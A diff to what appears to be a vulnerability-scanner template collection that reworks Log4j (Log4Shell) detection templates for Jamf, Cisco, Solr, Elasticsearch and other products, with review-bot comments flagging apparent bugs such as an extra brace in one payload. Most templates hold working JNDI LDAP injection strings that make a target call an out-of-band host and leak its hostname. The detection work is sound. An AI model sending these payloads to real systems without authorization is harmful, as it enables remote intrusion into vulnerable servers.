diff --git a/.new-additions b/.new-additions
index 141be645b2..7d2c21d7bc 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,51 +1,55 @@
-file/keys/postman-api-key.yaml
-headless/technologies/sap-spartacus.yaml
-http/cves/2017/CVE-2017-17731.yaml
-http/cves/2020/CVE-2020-27481.yaml
-http/cves/2021/CVE-2021-27314.yaml
-http/cves/2021/CVE-2021-27315.yaml
-http/cves/2021/CVE-2021-27316.yaml
-http/cves/2021/CVE-2021-27319.yaml
-http/cves/2021/CVE-2021-27320.yaml
-http/cves/2021/CVE-2021-30175.yaml
-http/cves/2021/CVE-2021-44228.yaml
-http/cves/2022/CVE-2022-24264.yaml
-http/cves/2022/CVE-2022-24265.yaml
-http/cves/2022/CVE-2022-24266.yaml
-http/cves/2022/CVE-2022-24716.yaml
-http/cves/2022/CVE-2022-27984.yaml
-http/cves/2022/CVE-2022-27985.yaml
-http/cves/2022/CVE-2022-3980.yaml
-http/cves/2022/CVE-2022-42095.yaml
-http/cves/2022/CVE-2022-42096.yaml
-http/cves/2022/CVE-2022-4328.yaml
-http/cves/2022/CVE-2022-45037.yaml
-http/cves/2022/CVE-2022-45038.yaml
-http/cves/2022/CVE-2022-46020.yaml
-http/cves/2023/CVE-2023-1020.yaml
-http/cves/2023/CVE-2023-1671.yaml
-http/cves/2023/CVE-2023-20864.yaml
-http/cves/2023/CVE-2023-25135.yaml
-http/cves/2023/CVE-2023-26360.yaml
-http/cves/2023/CVE-2023-27350.yaml
-http/cves/2023/CVE-2023-27524.yaml
-http/cves/2023/CVE-2023-29489.yaml
-http/cves/2023/CVE-2023-29922.yaml
-http/cves/2023/CVE-2023-30210.yaml
-http/cves/2023/CVE-2023-30212.yaml
-http/cves/2023/CVE-2023-31059.yaml
-http/cves/2023/CVE-2023-32235.yaml
-http/default-logins/powerjob-default-login.yaml
-http/default-logins/umami/umami-default-login.yaml
-http/exposed-panels/oracle-opera-login.yaml
-http/exposed-panels/papercut-ng-panel.yaml
-http/exposed-panels/proxmox-panel.yaml
-http/exposed-panels/red-lion-panel.yaml
-http/exposed-panels/sophos-web-appliance.yaml
-http/exposures/tokens/postman/postman-key.yaml
-http/misconfiguration/apache/apache-zeppelin-unauth.yaml
-http/osint/mail-archive.yaml
-http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml
-http/vulnerabilities/wordpress/advanced-booking-calendar-sqli.yaml
-http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml
-http/vulnerabilities/wordpress/wpml-xss.yaml
+cves/2017/CVE-2017-16894.yaml
+cves/2020/CVE-2020-10199.yaml
+cves/2021/CVE-2021-25078.yaml
+cves/2021/CVE-2021-35250.yaml
+cves/2022/CVE-2022-0747.yaml
+cves/2022/CVE-2022-0769.yaml
+cves/2022/CVE-2022-0773.yaml
+cves/2022/CVE-2022-0846.yaml
+cves/2022/CVE-2022-0864.yaml
+cves/2022/CVE-2022-1903.yaml
+cves/2022/CVE-2022-2219.yaml
+cves/2022/CVE-2022-24223.yaml
+cves/2022/CVE-2022-25485.yaml
+cves/2022/CVE-2022-25486.yaml
+cves/2022/CVE-2022-25487.yaml
+cves/2022/CVE-2022-25488.yaml
+cves/2022/CVE-2022-25489.yaml
+cves/2022/CVE-2022-25497.yaml
+cves/2022/CVE-2022-27926.yaml
+cves/2022/CVE-2022-28032.yaml
+cves/2022/CVE-2022-3062.yaml
+cves/2022/CVE-2022-37190.yaml
+cves/2022/CVE-2022-37191.yaml
+cves/2022/CVE-2022-38295.yaml
+cves/2022/CVE-2022-38296.yaml
+cves/2022/CVE-2022-38467.yaml
+cves/2022/CVE-2022-41441.yaml
+cves/2022/CVE-2022-42094.yaml
+cves/2022/CVE-2022-4321.yaml
+cves/2023/CVE-2023-0099.yaml
+cves/2023/CVE-2023-22620.yaml
+cves/2023/CVE-2023-22897.yaml
+cves/2023/CVE-2023-27008.yaml
+cves/2023/CVE-2023-27159.yaml
+cves/2023/CVE-2023-27179.yaml
+cves/2023/CVE-2023-29084.yaml
+default-logins/trassir/trassir-default-login.yaml
+exposed-panels/appwrite-panel.yaml
+exposed-panels/aspect-control-panel.yaml
+exposures/logs/yii-error-page.yaml
+misconfiguration/apollo-adminservice-unauth.yaml
+misconfiguration/default-spx-key.yaml
+misconfiguration/sql-server-report-viewer.yaml
+misconfiguration/thinkphp-errors.yaml
+network/detection/msmq-detect.yaml
+network/enumeration/beanstalk-service.yaml
+osint/hashnode.yaml
+osint/imgbb.yaml
+osint/rubygems.yaml
+technologies/default-apache-shiro.yaml
+technologies/switch-protocol.yaml
+vulnerabilities/generic/cache-poisoning-xss.yaml
+vulnerabilities/huawei/huawei-firewall-lfi.yaml
+vulnerabilities/others/universal-media-xss.yaml
+vulnerabilities/wordpress/ldap-wp-login-xss.yaml
diff --git a/http/cves/2021/CVE-2021-45046.yaml b/http/cves/2021/CVE-2021-45046.yaml index be6470065f..d27d0f5285 100644 --- a/http/cves/2021/CVE-2021-45046.yaml +++ b/http/cves/2021/CVE-2021-45046.yaml @@ -55,19 +55,23 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + - type: regex part: interactsh_request group: 2 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by mp on 2022/02/28 diff --git a/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml b/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml index 0ce5dfa770..8da70d7c20 100644 --- a/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml +++ b/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml 
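Review bot: The only hunk this diff has for CVE-2021-45046.yaml rewrites the matcher and both regex extractors to require a `\d{6}\.` prefix and its comments refer to `{{rand1}}`/`{{rand2}}`, yet nothing in the diff adds a `variables:` block or rewrites the request payload of this file the way every other template here gets it; unless the request section above line 55 already emits `${:-{{rand1}}}${:-{{rand2}}}.${hostName}`, the matcher now demands six digits that are never sent and the template silently stops firing. That request section is outside the hunk, so please confirm it. Separately, the inline comment on the matcher regex (`# Print extracted ... in output`) is copied from the extractor and misdescribes a matcher; `# Match only when the default-value lookups were evaluated (six digits precede the host); a literal echo of the payload does not match` states its actual purpose, and the same copied comment sits on the matcher in every other file in this diff.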
@@ -22,12 +22,16 @@ info: shodan-query: http.html:"Apache OFBiz" tags: cve,cve2021,ofbiz,oast,log4j,rce,apache,jndi,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | GET /webtools/control/main HTTP/1.1 Host: {{Hostname}} - Cookie: OFBiz.Visitor=${jndi:ldap://${hostName}.{{interactsh-url}}} + Cookie: OFBiz.Visitor=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookie.{{interactsh-url}}} matchers-condition: and matchers: @@ -39,13 +43,23 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by mp on 2022/05/27 diff --git a/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml b/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml index 6c5f039642..33c6af9415 100644 --- a/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml +++ b/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml 
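Review bot: In the regexes added to the matcher and extractors, the first group `([a-zA-Z0-9\.\-]+)` admits dots and is greedy, while the tail demands exactly three `[a-z0-9]+` labels plus `\w+`; the group 2 "injection point" extraction therefore only lands on the `cookie` label when `{{interactsh-url}}` expands to exactly three labels after it. If a self-hosted interactsh domain has more labels, group 1 swallows `cookie` and both extractors report the wrong value — presumably fine for the hosted servers, but worth stating next to the first regex, e.g. `# hostName may itself contain dots; the fixed 4-label tail (<point>.<id>.<oast>.<tld>) is what delimits it`. The same regex shape is used in every template in this diff.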
@@ -24,11 +24,15 @@ info: shodan-query: http.html:"Apache Solr" tags: vulhub,cve,solr,oast,log4j,cve2021,rce,apache,jndi,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @timeout: 25s - GET /solr/admin/{{endpoint}}?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7Bsys%3Aos.name%7D.{{interactsh-url}}%2F%7D HTTP/1.1 + GET /solr/admin/{{endpoint}}?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-{{rand1}}%7D%24%7B%3A-{{rand2}}}%7D.%24%7BhostName%7D.uri.{{interactsh-url}}%2F%7D HTTP/1.1 Host: {{Hostname}} attack: clusterbomb @@ -52,10 +56,21 @@ http: - type: regex part: interactsh_request regex: - - '((W|w)(I|i)(N|n)(D|d)(O|o)(W|w)(S|s))|((L|l)(I|i)(N|n)(U|u)(X|x))\.' # Windows or Linux + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + - type: regex part: interactsh_request + group: 2 regex: - - '((W|w)(I|i)(N|n)(D|d)(O|o)(W|w)(S|s))|((L|l)(I|i)(N|n)(U|u)(X|x))\.' # Windows or Linux + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + + - type: regex + part: interactsh_request + group: 1 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output diff --git a/http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml b/http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml index ccc0111b5c..3227490596 100644 --- a/http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml +++ b/http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml @@ -23,6 +23,10 @@ info: verified: "true" tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | 
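Review bot: The rewritten GET line in apache-solr-log4j-rce.yaml carries `%24%7B%3A-{{rand2}}}%7D`, one `}` too many after `{{rand2}}` (compare `%24%7B%3A-{{rand1}}%7D` immediately before it), so the second lookup decodes to `${:-NNN}}` and the stray brace lands between the six digits and the dot in the callback name; the new `\d{6}\.` matcher in the second hunk then cannot match and this template would never fire. The line should read `GET /solr/admin/{{endpoint}}?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-{{rand1}}%7D%24%7B%3A-{{rand2}}%7D.%24%7BhostName%7D.uri.{{interactsh-url}}%2F%7D HTTP/1.1`. The elasticsearch5 and vmware-siterecovery templates in this diff encode the same payload without the extra brace.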
@@ -32,7 +36,7 @@ http: Referer: {{RootURL}} Content-Type: application/x-www-form-urlencoded - username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&password= + username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&password= matchers-condition: and matchers: @@ -41,21 +45,31 @@ http: words: - "dns" - - type: regex - part: interactsh_request - regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable - - type: word part: body words: - "Jamf Pro Login" + - type: regex + part: interactsh_request + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by mp on 2022/05/27 diff --git a/http/vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml b/http/vulnerabilities/cisco/cisco-cloudcenter-suite-log4j-rce.yaml similarity index 79% rename from http/vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml rename to http/vulnerabilities/cisco/cisco-cloudcenter-suite-log4j-rce.yaml index 56aa00d60d..e86454abc3 100644 --- a/http/vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml +++ b/http/vulnerabilities/cisco/cisco-cloudcenter-suite-log4j-rce.yaml 
@@ -22,13 +22,17 @@ info: shodan-query: title:"CloudCenter Suite" tags: cve,cve2021,jndi,log4j,rce,oast,cloudcenter,cisco,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @timeout: 10s POST /suite-auth/login HTTP/1.1 Host: {{Hostname}} - Accept: application/json, text/plain, */${jndi:ldap://${sys:os.name}.{{interactsh-url}}} + Accept: application/json, text/plain, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accept.{{interactsh-url}}} Content-Type: application/json {"username":"{{randstr}}@{{randstr}}.com","password":"{{randstr}}","tenantName":"{{randstr}}"} @@ -43,7 +47,7 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output - type: word part: header @@ -55,10 +59,16 @@ http: kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by md on 2023/03/22 diff --git a/http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml b/http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml index 345c87171d..90553b57bf 100644 --- a/http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml +++ b/http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml 
@@ -20,6 +20,10 @@ info: verified: "true" tags: cve,cve2021,rce,jndi,log4j,cisco,kev,oast +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @@ -29,7 +33,7 @@ http: Origin: {{BaseURL}} Referer: {{BaseURL}}/ccmadmin/showHome.do - appNav=ccmadmin&j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin + appNav=ccmadmin&j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&j_password=admin matchers-condition: and matchers: @@ -41,17 +45,23 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by md on 2022/10/04 diff --git a/http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml b/http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml index 9881afadea..703640362b 100644 --- a/http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml +++ b/http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml @@ -20,6 +20,10 @@ info: verified: "true" tags: log4j,cisco,tenable,cve,cve2021,rce,jndi,kev,oast +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | 
@@ -30,7 +34,7 @@ http: Origin: {{BaseURL}} Referer: {{BaseURL}} - j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin&submit=Log+In + j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&j_password=admin&submit=Log+In matchers-condition: and matchers: @@ -42,7 +46,7 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output - type: word part: body @@ -54,10 +58,16 @@ http: kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by CS 03/27/2023 diff --git a/http/vulnerabilities/code42/code42-log4j-rce.yaml b/http/vulnerabilities/code42/code42-log4j-rce.yaml index 70617011be..a55dac0ea0 100644 --- a/http/vulnerabilities/code42/code42-log4j-rce.yaml +++ b/http/vulnerabilities/code42/code42-log4j-rce.yaml @@ -24,10 +24,14 @@ info: metadata: max-request: 1 +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - method: GET path: - - '{{BaseURL}}/c42api/v3/LoginConfiguration?username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&url=https://localhost' + - '{{BaseURL}}/c42api/v3/LoginConfiguration?username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&url=https://localhost' matchers-condition: and matchers: 
@@ -39,13 +43,23 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by mp on 2022/05/27 diff --git a/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml b/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml index b78a250390..cfde4d8c4e 100644 --- a/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml +++ b/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml @@ -22,6 +22,10 @@ info: verified: "true" tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @@ -31,7 +35,7 @@ http: Referer: {{RootURL}} Content-Type: application/x-www-form-urlencoded - username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&password= + username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&password= matchers-condition: and matchers: 
@@ -48,13 +52,23 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by md on 2023/03/23 diff --git a/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml b/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml index f7b4b430ef..4f79fc42be 100644 --- a/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml +++ b/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml @@ -23,6 +23,10 @@ info: verified: "true" tags: jndi,log4j,rce,cve,cve2021,ivanti,oast,mobileiron,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @@ -30,7 +34,7 @@ http: Referer: {{RootURL}}/mifs/user/login.jsp Content-Type: application/x-www-form-urlencoded - j_username=${jndi:ldap://${hostName}.{{interactsh-url}}}&j_password=password&logincontext=employee + j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&j_password=password&logincontext=employee matchers-condition: and matchers: 
@@ -47,13 +51,23 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by md on 2023/03/23 diff --git a/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml b/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml index 5f1af33221..72954c6ec5 100644 --- a/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml +++ b/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml @@ -21,10 +21,14 @@ info: verified: "true" tags: jndi,log4j,rce,oast,elasticsearch,cve,cve2021,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | - GET /_search?a=$%7Bjndi%3Aldap%3A%2F%2F%24%7BhostName%7D.{{interactsh-url}}%7D HTTP/1.1 + GET /_search?a=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-{{rand1}}%7D$%7B%3A-{{rand2}}%7D.$%7BhostName%7D.search.{{interactsh-url}}%7D HTTP/1.1 Host: {{Hostname}} { 
@@ -44,17 +48,23 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by md on 2022/10/04 diff --git a/http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml b/http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml index af60c637ea..065c5577b3 100644 --- a/http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml +++ b/http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml @@ -20,6 +20,10 @@ info: verified: "true" tags: cve,cve2021,jndi,log4j,rce,oast,goanywhere,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | 
